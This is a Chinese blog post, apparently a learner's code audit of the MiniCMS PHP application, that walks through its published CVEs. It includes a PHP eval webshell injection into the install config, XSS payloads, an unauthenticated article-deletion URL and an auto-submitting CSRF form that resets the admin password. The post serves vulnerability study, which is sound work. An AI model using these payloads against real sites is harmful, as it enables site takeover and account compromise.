MiniCMS漏洞审计

Posted Zero_Adam

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MiniCMS漏洞审计相关的知识,希望对你有一定的参考价值。

0. 前言

跟着feng师傅学代码审计。。
(抄袭代码审计)
feng

1. 前言

结构:

│  build.php
│  index.php 整个项目的入口,首先引入核心库mc-core.php,然后进行路由,对路由结果进行相应的渲染,相当于MVC中的C
│  install.txt 复制为php文件后,用来安装MiniCMS
│  README.md
│
├─mc-admin 管理功能的实现
│      conf.php 用户设置页面,包括接收和保存更改的设置
│      editor.php 编辑器的大小、样式调整的库
│      foot.php html<foot>标签构造
│      head.php token验证,html<head>标签构造;若验证失败,跳转至主页
│      index.php 后台登陆身份验证页面
│      page-edit.php 页面编写处理逻辑,包括显示编辑页面、接收提交的页面、页面序列化储存
│      page.php 管理页面的库,声明加载数据、删除页面、还原页面(从回收站还原)
│      post-edit.php 文章编写处理逻辑,包括显示编辑页面、接收提交的页面、页面序列化储存
│      post.php 管理文章的库,声明加载数据、删除文章、还原文章(从回收站还原)
│      style.css 后台用到的CSS
│
└─mc-files
    │  markdown.php 一个开源的markdown解析库
    │  mc-conf.php 配置文件,包含用户名和密码等敏感信息
    │  mc-core.php 引入mc-tags、mc-conf,声明404函数
    │  mc-rss.php 订购RSS的链接
    │  mc-tags.php 相当于M,引入markdown、包括一些核心函数,包括了加载各种信息的函数(网站名、文章数、前进后退等,中间有各种过滤,可以重点分析)
    │
    ├─pages
    │  └─index
    │          delete.php 使用数组储存了删除页面的信息(id、标题、标签等)与data文件夹内的文章数据一一对应
    │          draft.php 使用数组储存了草稿页面的信息(id、标题、标签等)与data文件夹内的文章数据一一对应
    │          publish.php 使用数组储存了已发布的页面的信息(id、标题、标签等)与data文件夹内的文章数据一一对应
    │
    ├─posts
    │  ├─data 储存了文章内容的反序列化数据(文章内容等)
    │  └─index
    │          delete.php 使用数组储存了删除的文章的信息(id、标题、标签等)与data文件夹内的文章数据一一对应
    │          draft.php 使用数组储存了草稿文章的信息(id、标题、标签等)与data文件夹内的文章数据一一对应
    │          publish.php 使用数组储存了已发布文章的信息(id、标题、标签等)与data文件夹内的文章数据一一对应
    │
    └─theme
            index.php 主题文件,决定了页面的风格,将C传入的信息显示出来,相当于V
            style.css 主题使用的CSS风格

feng师傅整起来的CVE:

  • CVE-2018-1000638 反射型XSS
    存在位置:/MiniCMS-master/mc-admin/page.php处date参数存在XSS漏洞

  • CVE-2018-10227 储存型XSS
    存在位置:/MiniCMS-master/MiniCMS-master/mc-admin/conf.php
    在设置中修改网站地址处存在XSS漏洞,可直接储存XSS payload。

  • CVE-2018-10296 储存型XSS 存在位置: /MiniCMS-master/mc-admin/post-edit.php
    编辑文章标题处可直接储存XSS payload。

  • CVE-2018-10423
    个人认为不是漏洞,只是个BUG,此处的BUG只是网页中的超链接错误地指向了网站根目录,点击后就会去访问网站根目录,这个时候,洞主的apache配置没有关文件遍历,就误认为是CMS的漏洞,显然是不对的,洞主应该是刷分的,没想到竟然过了:)。

  • CVE-2018-10424 物理路径泄露
    存在位置:/MiniCMS-master/mc-admin/post-edit.php处将GET的参数id改为不存在的文件名,会爆出物理地址。

  • CVE-2018-15899 反射型XSS
    存在位置:/minicms/mc-admin/page.php的GET参数date存在XSS(似乎与CVE-2018-1000638重复了。。)。

  • CVE-2018-16233 反射型XSS
    存在位置:/MiniCMS-1.10/mc-admin/post-edit.php处的POST参数tags存在XSS。

  • CVE-2018-16298 反射型XSS
    存在位置:/MiniCMS-1.10/mc-admin/post.php的GET参数tag存在XSS。

  • CVE-2018-17039 反射型XSS 存在位置:/mc-admin/index.php使用任意GET参数并取XSS
    payload,可在IE浏览器中执行JS。

  • CVE-2018-18890 物理路径泄露
    存在位置:post.php?delete=qe54cn&state=delete删除不存在的文章时爆出物理路径。

  • CVE-2018-18891 部分文件删除(逻辑漏洞,删除操作在身份认证之前进行)
    存在位置:/mc-admin/post.php?delete=qe54cn&state=delete不用登陆可直接删除文章。

  • CVE-2018-18892 鸡肋的RCE 存在位置:
    install.php在安装时在配置处可以向配置文件直接注入PHP代码;由于在MiniCMS安装完毕后此文件会自我删除,在实际情况下并没有太大的作用。

  • CVE-2018-20520 反射型XSS
    存在位置:类似于CVE-2018-17039,/MiniCMS1/mc-admin/post-edit.php使用任意GET参数并取XSS
    payload,可在IE浏览器中执行JS。

  • CVE-2018-9092 CSRF 存在位置:
    http://127.0.0.1//MiniCMS/mc-admin/post.php?delete=aaaaaa&state=publish&date=&tag= 此处的CSRF会导致任意文章删除:

  • CVE-2019-9603 CSRF 存在位置:/minicms/mc-admin/conf.php
    此处的CSRF会导致任意修改网站配置。

慢慢把这些CVE复现一遍。

MiCMS源码下载 : MiniCMS

CVE-2018-18892 鸡肋的RCE

确实是一个鸡肋的RCE,可以说99.9%是没用的,剩下0.1%就在DJBCTF出现了,太离谱了。
关键就在install.txt,这个文件是要改后缀成php然后进行安装。改成 install.php 。 关键代码是这里:

if (!@file_put_contents('mc-files/mc-conf.php', 
    	"<?php \\$mc_config = array(".
    	"'version'   => '/*MINICMS_VERSION*/',".
    	"'site_link' => '{$_POST['sitelink']}',".
    	"'site_name' => '{$_POST['sitename']}',".
    	"'site_desc' => '又一个MiniCMS网站',".
    	"'user_name' => '{$_POST['username']}',".
    	"'user_pass' => '{$_POST['password']}',".
    	"'user_nick' => '{$_POST['nickname']}',".
    	"'comment_code' => '');?>"
    )) {

相当于安装的时候进行设置,而且是直接把POST的参数写进了mc-conf.php里面,这个文件是在后面的各种功能里基本上都会require的文件,能直接往里面写马,任意一个POST参数传:

直接post数据的时候,闭合,放进来自己的 一句话马。然后注释掉。

');eval($_REQUEST['cmd'];//)

这个洞也可能是开发自己留的,可能是开发都觉得这个没过滤也没关系。。毕竟是自己进行install的。。。过于鸡肋。
在这里插入图片描述

CVE-2018-1000638 反射型XSS

MiniCMS version 1.1 contains a Cross Site Scripting (XSS) vulnerability in http://example.org/mc-admin/page.php?date={payload} that can result in code injection.

if (isset($_GET['date']))
  $filter_date = $_GET['date'];
else
  $filter_date = '';

又GET传入参数date,之后是$filter_date,没有任何的过滤就插入了前端代码中,而且插入了许多的位置。

<?php echo $page_count; ?>&nbsp;&nbsp;
    <a class="link_button" href="?state=<?php echo $state; ?>&date=<?php echo $filter_date;?>">&laquo;</a>
    <a class="link_button" href="?state=<?php echo $state; ?>&date=<?php echo $filter_date;?>&page=<?php echo $prev_page; ?>">&lsaquo;</a><input type="text" value="<?php echo $page_num; ?>" id="page_input_1"/>,<?php echo $last_page; ?><a class="link_button" href="?state=<?php echo $state; ?>&date=<?php echo $filter_date;?>&page=<?php echo $next_page; ?>">&rsaquo;</a>
    <a class="link_button" href="?state=<?php echo $state; ?>&date=<?php echo $filter_date;?>&page=<?php echo $last_page; ?>">&raquo;</a>

payload如下 :

"></a> <img src=1 οnerrοr=alert(1)> <a>
"></a> <img src=1 onerror=alert(1)> <!--

在这里插入图片描述

CVE-2018-10227 存储型XSS

MiniCMS v1.10 has XSS via the mc-admin/conf.php site_link parameter.

if (isset($_POST['save'])) {
  $user_name_changed = $_POST['user_name'] != $mc_config['user_name'];
  
  $mc_config['site_name'] = $_POST['site_name'];
  $mc_config['site_desc'] = $_POST['site_desc'];
  $mc_config['site_link'] = $_POST['site_link'];
  $mc_config['user_nick'] = $_POST['user_nick'];
  $mc_config['user_name'] = $_POST['user_name'];
  $mc_config['comment_code'] = get_magic_quotes_gpc() ? stripslashes(trim($_POST['comment_code'])) : trim($_POST['comment_code']);
  
  if ($_POST['user_pass'] != '')
    $mc_config['user_pass'] = $_POST['user_pass'];

  $code = "<?php\\n\\$mc_config = ".var_export($mc_config, true)."\\n?>";
  
  file_put_contents('../mc-files/mc-conf.php', $code);
  
  if ($_POST['user_pass'] != '' || $user_name_changed) {
    setcookie('mc_token', md5($mc_config['user_name'].'_'.$mc_config['user_pass']));
  }
  
  $display_info = true;
}

在这里插入图片描述conf.php 进行设置的更改,site_link 没有过滤,直接写入mc-conf.php中去了。

后面的输出有过滤,好像没有办法利用

    <div class="field">
      <div class="label">网站地址</div>
      <input class="textbox" type="text" name="site_link" value="<?php echo htmlspecialchars($site_link); ?>" />
      <div class="info"></div>
    </div>

然后我就去mc-conf.php里面去看,,里面没啥,,然后我就不会了。思路就没了。然后看 feng 师傅的blog。

看 head.php 中。 (哦~~,这里 直接 全局搜索 site_link 就有了 )

    <h3 id="menu_title"><a href="<?php echo $mc_config['site_link'] != '' ? $mc_config['site_link'] : '/'; ?>"><?php echo htmlspecialchars($mc_config['site_name']); ?></a></h3>

直接把$mc_config['site_link']输出给了 前端,并没有 htmlspecialchars 的过滤。但是 site_name 却有过滤。。。

那我们就在conf.php中修改完,然后到head.php中看就行了。

payload:

aaaa"></a><img src=1 onerror=alert(1)> <a> 

在这里插入图片描述

在这里插入图片描述
剩下的一些XSS就不放了,原理都差不多,就是开发对输入没过滤。

CVE-2018-10424 物理路径泄露

mc-admin/post-edit.php in MiniCMS 1.10 allows full path disclosure via
a modified id field.

} else if (isset($_GET['id'])) {
  $file_path = '../mc-files/posts/data/'.$_GET['id'].'.dat';
  
  $data = unserialize(file_get_contents($file_path));
  
  $post_id      = $data['id'];
  $post_state   = $data['state'];
  $post_title   = $data['title'];
  $post_content = $data['content'];
  $post_tags    = $data['tags'];
  $post_date    = $data['date'];
  $post_time    = $data['time'];
  $post_can_comment = isset($data['can_comment']) ? $data['can_comment'] : '1';
}

如果get传id,前端输出的内容就是id对应的文章内容,这里输入不存在的id会报错,爆出物理路径:

在这里插入图片描述

CVE-2018-18891 部分文件删除(逻辑漏洞,删除操作在身份认证之前进行) ------ 这个我没审明白,,,

MiniCMS 1.10 allows file deletion via /mc-admin/post.php?state=delete&delete= because the authentication check occurs too late.

越权的漏洞,需要审代码才可以发现。主要的问题就在于权限判断是在head.php.

ini_set("display_errors", "On"); error_reporting(E_ALL);
require_once '../mc-files/mc-conf.php';

if (isset($_COOKIE['mc_token'])) {
  $token = $_COOKIE['mc_token'];

  if ($token != md5($mc_config['user_name'].'_'.$mc_config['user_pass'])) {
    Header("Location:index.php");
    exit;
  }
} else {
  Header("Location:index.php");
  exit;
}

而在 post.php 和 page.php 都出现了这么一个问题: 等到他们本身的php代码都执行完之后,才在第188行进行require:

<?php require 'head.php' ?>

而如果要进行文章删除的功能,在require之前的代码中执行,因为造成了垂直越权的文章删除。

POC:

http://www.fuxian.com/mc-admin/post.php?state=delete&delete=aaaaaa

删除一波看看。

呃呃,没de出来,,

在这里插入图片描述
好像存储在mc-files/posts/aaaaaa.dat中,是用序列化来存储的。可见标题和内容都是对应的的。
在这里插入图片描述

CVE-2018-9092 CSRF ---- 这个也没明白,,

There is a CSRF vulnerability in mc-admin/conf.php in MiniCMS 1.10 that can change the administrator account password.

基本上算是可以随便修改配置了,看来是MiniCMS对于CSRF这块并没有进行防御,

POC如下:

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
<title>test</title>
<body>
<form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
<input type="hidden" name="site_name" value="hack123" />  
<input type="hidden" name="site_desc" value="hacktest" />  
<input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />  
<input type="hidden" name="user_nick" value="hack" />  
<input type="hidden" name="user_name" value="admin" />  
<input type="hidden" name="user_pass" value="hackpass" />  
<input type="hidden" name="comment_code" value="" />  
<input type="hidden" name="save" value="保存设置" /> 
</form>
<script>
	document.forms[0].submit();
</script>
</body>
</head>
</html>

2. 总结:

,,,艹了。没整明白,,感觉一般,不会的就看feng师傅的来,,,
但是总算是开始了代码审计的道路,之前一直想审计的。苦于没有方法和道路,这次有了,就跟着feng师傅慢慢来学习叭。

以上是关于MiniCMS漏洞审计的主要内容,如果未能解决你的问题,请参考以下文章

php代码审计5审计命令执行漏洞

php代码审计4审计代码执行漏洞

PHP代码审计18—PHP代码审计小结

通过代码审计找出网站中的XSS漏洞实战

php代码审计9审计反序列化漏洞

“OWASP Top 10 2017”之外常见漏洞的代码审计